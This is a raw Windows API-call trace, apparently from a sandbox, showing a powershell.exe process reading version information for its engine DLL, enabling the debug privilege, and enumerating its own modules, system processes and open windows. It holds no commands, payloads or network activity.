	[0320.464] GetVersionExW (in: lpVersionInformation=0x1cddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cddb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0320.465] SetErrorMode (uMode=0x1) returned 0x1
	[0320.466] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdf10 | out: lpFileInformation=0x1cdf10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0320.467] SetErrorMode (uMode=0x1) returned 0x1
	[0320.470] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce180 | out: lpdwHandle=0x1ce180) returned 0x94c
	[0320.472] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b972d8 | out: lpData=0x2b972d8) returned 1
	[0320.865] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce0f8, puLen=0x1ce0f0 | out: lplpBuffer=0x1ce0f8*=0x2b97374, puLen=0x1ce0f0) returned 1
	[0320.867] lstrlenW (lpString="䅁") returned 1
	[0320.876] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b97450, puLen=0x1ce060) returned 1
	[0320.877] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0320.879] CoTaskMemAlloc (cb=0x2e) returned 0x44b710
	[0320.879] lstrcpyW (in: lpString1=0x44b710, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0320.880] CoTaskMemFree (pv=0x44b710) 
	[0320.880] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b974a4, puLen=0x1ce060) returned 1
	[0320.880] lstrlenW (lpString="System.Management.Automation") returned 28
	[0320.880] CoTaskMemAlloc (cb=0x3c) returned 0x4476a0
	[0320.880] lstrcpyW (in: lpString1=0x4476a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0320.880] CoTaskMemFree (pv=0x4476a0) 
	[0320.880] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b97500, puLen=0x1ce060) returned 1
	[0320.880] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0320.880] CoTaskMemAlloc (cb=0x20) returned 0x452490
	[0320.880] lstrcpyW (in: lpString1=0x452490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0320.880] CoTaskMemFree (pv=0x452490) 
	[0320.880] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b97540, puLen=0x1ce060) returned 1
	[0320.880] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0320.880] CoTaskMemAlloc (cb=0x44) returned 0x4476a0
	[0320.880] lstrcpyW (in: lpString1=0x4476a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0320.881] CoTaskMemFree (pv=0x4476a0) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b975a8, puLen=0x1ce060) returned 1
	[0320.881] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0320.881] CoTaskMemAlloc (cb=0x76) returned 0x3f5770
	[0320.881] lstrcpyW (in: lpString1=0x3f5770, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0320.881] CoTaskMemFree (pv=0x3f5770) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b97644, puLen=0x1ce060) returned 1
	[0320.881] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0320.881] CoTaskMemAlloc (cb=0x44) returned 0x4476a0
	[0320.881] lstrcpyW (in: lpString1=0x4476a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0320.881] CoTaskMemFree (pv=0x4476a0) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b976a8, puLen=0x1ce060) returned 1
	[0320.881] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0320.881] CoTaskMemAlloc (cb=0x58) returned 0x4177f0
	[0320.881] lstrcpyW (in: lpString1=0x4177f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0320.881] CoTaskMemFree (pv=0x4177f0) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b97724, puLen=0x1ce060) returned 1
	[0320.881] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0320.881] CoTaskMemAlloc (cb=0x20) returned 0x452490
	[0320.881] lstrcpyW (in: lpString1=0x452490, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0320.881] CoTaskMemFree (pv=0x452490) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x2b973cc, puLen=0x1ce060) returned 1
	[0320.881] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0320.881] CoTaskMemAlloc (cb=0x66) returned 0x444410
	[0320.881] lstrcpyW (in: lpString1=0x444410, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0320.881] CoTaskMemFree (pv=0x444410) 
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x0, puLen=0x1ce060) returned 0
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x0, puLen=0x1ce060) returned 0
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ce068, puLen=0x1ce060 | out: lplpBuffer=0x1ce068*=0x0, puLen=0x1ce060) returned 0
	[0320.881] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce038, puLen=0x1ce030 | out: lplpBuffer=0x1ce038*=0x2b97374, puLen=0x1ce030) returned 1
	[0320.883] CoTaskMemAlloc (cb=0x204) returned 0x40c490
	[0320.883] VerLanguageNameW (in: wLang=0x0, szLang=0x40c490, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0320.884] CoTaskMemFree (pv=0x40c490) 
	[0320.884] VerQueryValueW (in: pBlock=0x2b972d8, lpSubBlock="\\", lplpBuffer=0x1ce088, puLen=0x1ce080 | out: lplpBuffer=0x1ce088*=0x2b97300, puLen=0x1ce080) returned 1
	[0320.889] GetCurrentProcessId () returned 0x4fc
	[0321.331] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ccfb0 | out: lpLuid=0x1ccfb0*(LowPart=0x14, HighPart=0)) returned 1
	[0321.341] GetCurrentProcess () returned 0xffffffffffffffff
	[0321.342] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ccfd0 | out: TokenHandle=0x1ccfd0*=0x1bc) returned 1
	[0321.343] AdjustTokenPrivileges (in: TokenHandle=0x1bc, DisableAllPrivileges=0, NewState=0x2b9ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0321.344] CloseHandle (hObject=0x1bc) returned 1
	[0321.348] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1bc
	[0321.357] EnumProcessModules (in: hProcess=0x1bc, lphModule=0x2b9abb8, cb=0x200, lpcbNeeded=0x1cdfe8 | out: lphModule=0x2b9abb8, lpcbNeeded=0x1cdfe8) returned 1
	[0321.359] GetModuleInformation (in: hProcess=0x1bc, hModule=0x13f370000, lpmodinfo=0x2b9ae28, cb=0x18 | out: lpmodinfo=0x2b9ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0321.359] CoTaskMemAlloc (cb=0x804) returned 0x454260
	[0321.359] GetModuleBaseNameW (in: hProcess=0x1bc, hModule=0x13f370000, lpBaseName=0x454260, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0321.360] CoTaskMemFree (pv=0x454260) 
	[0321.360] CoTaskMemAlloc (cb=0x804) returned 0x454260
	[0321.360] GetModuleFileNameExW (in: hProcess=0x1bc, hModule=0x13f370000, lpFilename=0x454260, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0321.360] CoTaskMemFree (pv=0x454260) 
	[0321.361] CloseHandle (hObject=0x1bc) returned 1
	[0321.839] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x4fc) returned 0x1bc
	[0321.840] GetExitCodeProcess (in: hProcess=0x1bc, lpExitCode=0x1ce118 | out: lpExitCode=0x1ce118*=0x103) returned 1
	[0321.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b9b088, Length=0x20000, ResultLength=0x1ce0e0 | out: SystemInformation=0x12b9b088, ResultLength=0x1ce0e0*=0x17e20) returned 0x0
	[0321.863] EnumWindows (lpEnumFunc=0x2b166ac, lParam=0x0) returned 1
	[0321.864] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.864] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x558
	[0321.864] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.864] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.864] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x538
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x778
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x778
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.865] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd94
	[0321.866] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd74
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xd00
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xcd8
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc84
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xca4
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc64
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xc24
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb84
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xbac
	[0321.867] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x384
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xab8
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x33c
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa44
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa64
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x8a8
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xaf0
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x88c
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb04
	[0321.868] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x910
	[0321.869] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x230
	[0321.869] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xac0
	[0321.869] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xab4
	[0321.869] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xaac
	[0321.870] GetWindow (hWnd=0x10262, uCmd=0x4) returned 0x0
	[0321.870] IsWindowVisible (hWnd=0x10262) returned 0
	[0321.870] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x3d0
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x978
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa7c
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x59c
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa88
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa6c
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa68
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x9f8
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xa04
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x924
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x8dc
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7dc
	[0321.871] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x768
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x764
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x820
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x810
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x794
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x83c
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7ac
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb44
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb5c
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x838
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.872] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x818
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x5b8
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x494
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x1ec
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x440
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x7e8
	[0321.873] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x730
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x2c8
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x31c
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x330
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x128
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x5c8
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x6f8
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x358
	[0321.874] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x73c
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0xb0
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x250
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x240
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x790
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x61c
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x540
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x538
	[0321.875] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x568
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x538
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x568
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x538
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x540
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x540
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x57c
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x460
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x554
	[0321.876] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x528
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x79c
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4e0
	[0321.877] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cde40 | out: lpdwProcessId=0x1cde40) returned 0x4d0
